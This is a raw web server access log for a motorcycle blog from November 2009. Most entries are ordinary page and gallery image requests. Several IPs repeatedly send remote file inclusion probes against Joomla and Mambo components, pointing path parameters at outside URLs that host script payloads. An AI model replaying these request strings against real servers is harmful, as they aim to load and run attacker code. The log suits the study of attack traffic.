70.38.31.183 - - [20/Nov/2009:08:00:03 -0800] "GET /logs/access_091019.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.186.117.57 - - [20/Nov/2009:08:00:10 -0800] "GET /logs///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src/id? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:08:00:13 -0800] "GET /logs/access_091019.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.186.117.57 - - [20/Nov/2009:08:00:33 -0800] "GET /logs///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src/id? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.dmulk.com"
195.186.64.163 - - [20/Nov/2009:08:00:45 -0800] "GET /logs/access_080523.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cbnumed.or.kr/bbs/enda-id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.186.117.57 - - [20/Nov/2009:08:00:49 -0800] "GET /logs///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src/id? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:08:01:05 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:08:01:06 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 200 15893 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:08:01:13 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.102.237.81 - - [20/Nov/2009:08:01:28 -0800] "GET /logs/access_080608.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://gcomweb.com/assinante//include/html/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.102.237.81 - - [20/Nov/2009:08:01:32 -0800] "GET /logs/access_080606.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://gcomweb.com/assinante//include/html/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.183 - - [20/Nov/2009:08:01:40 -0800] "GET /logs/access_091019.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://come.kr/bbs/data/data2/sken/id1(feelcomz).txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.186.117.57 - - [20/Nov/2009:08:01:43 -0800] "GET /logs///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src/id? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.dmulk.com"
66.102.237.81 - - [20/Nov/2009:08:01:44 -0800] "GET /logs/access_080727.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://gcomweb.com/assinante//include/html/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.102.237.81 - - [20/Nov/2009:08:01:50 -0800] "GET /logs/access_080609.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://gcomweb.com/assinante//include/html/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:01:53 -0800] "GET /bikes/2k6klr650/klr001a.JPG HTTP/1.1" 200 325181 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "www.dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:01:55 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "www.dmulk.com"
213.186.117.57 - - [20/Nov/2009:08:02:41 -0800] "GET /logs///administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src/id? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.dmulk.com"
213.186.117.57 - - [20/Nov/2009:08:03:34 -0800] "GET /logs///administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src/id? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:51 -0800] "GET / HTTP/1.1" 200 15877 "http://www.advrider.com/forums/showthread.php?t=510774" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "www.dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:51 -0800] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.3.2 HTTP/1.1" 200 57276 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:51 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.css?ver=20090514 HTTP/1.1" 200 3864 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:51 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/style.css HTTP/1.1" 200 10083 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:51 -0800] "GET /blog/wp-content/plugins/nextgen-gallery/css/nggallery.css?ver=1.0.0 HTTP/1.1" 200 5715 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:51 -0800] "GET /blog/wp-includes/js/thickbox/thickbox.js?ver=3.1-20090123 HTTP/1.1" 200 12100 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:52 -0800] "GET /blog/wp-includes/js/swfobject.js?ver=2.1 HTTP/1.1" 200 9759 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:52 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture010-1024.jpg HTTP/1.1" 200 71517 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:52 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture279-1024.jpg HTTP/1.1" 200 53903 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:52 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture007-1024.jpg HTTP/1.1" 200 74041 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:52 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture020-1024.jpg HTTP/1.1" 200 95191 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:52 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture022-1024.jpg HTTP/1.1" 200 56436 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:52 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture011-1024.jpg HTTP/1.1" 200 66511 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:54 -0800] "GET /blog/wp-content/uploads/imagerotator.swf HTTP/1.1" 200 42753 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:54 -0800] "GET /blog/wp-content/uploads/imagerotator.swf HTTP/1.1" 200 42753 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:55 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture036-1024.jpg HTTP/1.1" 200 93501 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:55 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture032-1024.jpg HTTP/1.1" 200 101230 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:55 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture038-1024.jpg HTTP/1.1" 200 81949 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:55 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture037-1024.jpg HTTP/1.1" 200 84214 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:56 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture039-1024.jpg HTTP/1.1" 200 94005 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:57 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture040-1024.jpg HTTP/1.1" 200 96476 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:58 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture041-1024.jpg HTTP/1.1" 200 83786 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:58 -0800] "GET /blog/wp-content/plugins/nextgen-gallery/xml/imagerotator.php?gid=20&641 HTTP/1.1" 200 11455 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:59 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture043-1024.jpg HTTP/1.1" 200 79971 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:59 -0800] "GET /blog/wp-content/plugins/nextgen-gallery/xml/imagerotator.php?gid=0&477 HTTP/1.1" 200 473154 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:59 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture042-1024.jpg HTTP/1.1" 200 75627 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:03:59 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture044-1024.jpg HTTP/1.1" 200 78072 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:00 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture036-1024.jpg HTTP/1.1" 200 93501 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:00 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture056-1024.jpg HTTP/1.1" 200 76150 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:01 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture046-1024.jpg HTTP/1.1" 200 81406 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:03 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture059-1024.jpg HTTP/1.1" 200 92776 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:03 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture052-1024.jpg HTTP/1.1" 200 76308 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:05 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture061-1024.jpg HTTP/1.1" 200 105839 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:05 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture060-1024.jpg HTTP/1.1" 200 78967 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:05 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-045_1.jpg HTTP/1.1" 200 217517 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:06 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture062-1024.jpg HTTP/1.1" 200 81896 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:06 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture064-1024.jpg HTTP/1.1" 200 90737 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:06 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture065-1024.jpg HTTP/1.1" 200 97893 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:08 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture068-1024.jpg HTTP/1.1" 200 65857 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:08 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture067-1024.jpg HTTP/1.1" 200 82518 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:09 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture070-1024.jpg HTTP/1.1" 200 78258 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:10 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:10 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickbgwide.jpg HTTP/1.1" 200 885 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:10 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickheader.jpg HTTP/1.1" 200 10076 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:10 -0800] "GET /blog/wp-content/themes/defaultwide/defaultwide/images/kubrickfooter.jpg HTTP/1.1" 200 2683 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:10 -0800] "GET /blog/wp-includes/js/thickbox/loadingAnimation.gif HTTP/1.1" 200 5886 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:10 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture063-1024.jpg HTTP/1.1" 200 87113 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:12 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "www.dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:22 -0800] "GET /blog/wp-content/gallery/2009-08-29-westoc/Picture458-1024.jpg HTTP/1.1" 200 68600 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:30 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture002-1024.jpg HTTP/1.1" 200 85217 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:36 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-013_2.jpg HTTP/1.1" 200 363863 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:44 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture014-1024.jpg HTTP/1.1" 200 44027 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
213.186.117.57 - - [20/Nov/2009:08:04:47 -0800] "GET /logs///administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.groupe-rouquette.com/Jacquier/src/id? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:04:52 -0800] "GET /blog/wp-content/gallery/2008-mountain-calstoc/004.jpg HTTP/1.1" 200 334435 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
79.64.223.41 - - [20/Nov/2009:08:04:56 -0800] "GET /logs/access_080523.log%20%20//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:05:08 -0800] "GET /blog/wp-content/gallery/2008-yuma/029.jpg HTTP/1.1" 200 177616 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:05:23 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-166_1.jpg HTTP/1.1" 200 256212 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
63.84.249.90 - - [20/Nov/2009:08:05:24 -0800] "GET /blog/wp-content/gallery/2009-10-24-wrr/picture033-1024.jpg HTTP/1.1" 200 94910 "http://dmulk.com/blog/wp-content/uploads/imagerotator.swf" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; yie8)" "dmulk.com"
